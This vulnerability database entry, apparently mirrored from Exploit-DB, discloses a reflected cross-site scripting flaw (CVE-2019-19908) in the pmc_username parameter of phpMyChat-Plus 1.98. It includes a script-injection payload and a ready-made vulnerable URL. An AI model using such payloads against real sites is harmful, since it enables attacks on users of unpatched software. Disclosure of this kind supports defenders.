Lucene search
Chris InzingaEXPLOITPACK:C85D6E48E5E67530AD097593FF0BC18AHistoryDec 20, 2019 - 12:00 a.m.
phpMyChat-Plus 1.98 - pmc_username Reflected Cross-Site Scripting
2019-12-2000:00:00
Chris Inzinga
33
EPSS
0.005
Percentile
77.5%
phpMyChat-Plus 1.98 - pmc_username Reflected Cross-Site Scripting
# Exploit Title: phpMyChat-Plus 1.98 - 'pmc_username' Reflected Cross-Site Scripting
# Date: 2019-12-19
# Exploit Author: Chris Inzinga
# Vendor Homepage: http://ciprianmp.com/latest/
# Download: https://sourceforge.net/projects/phpmychat/
# Tested On: Linux & Mac
# Version: 1.98
# CVE: CVE-2019-19908
Description:
The "pmc_username" parameter of pass_reset.php is vulnerable to reflected XSS
Payload:
"><script>alert('xss')</script>
Vulnerable URL:
http://localhost/plus/pass_reset.php?L=english&pmc_username="><script>alert('xss')</script>Related
prion
prion
Cross site scripting
2019-12-20 13:15:00
exploitdb
exploitdb
nuclei
nuclei
phpMyChat-Plus 1.98 - Cross-Site Scripting
2020-04-08 13:04:46
cve
cve
CVE-2019-19908
2019-12-20 13:15:11
cvelist
cvelist
CVE-2019-19908
2019-12-20 12:47:14
nvd
nvd
CVE-2019-19908
2019-12-20 13:15:11
zdt
zdt
attackerkb
attackerkb
CVE-2019-19908
2019-06-19 00:00:00
packetstorm
packetstorm
phpMyChat-Plus 1.98 Cross Site Scripting
2019-12-22 00:00:00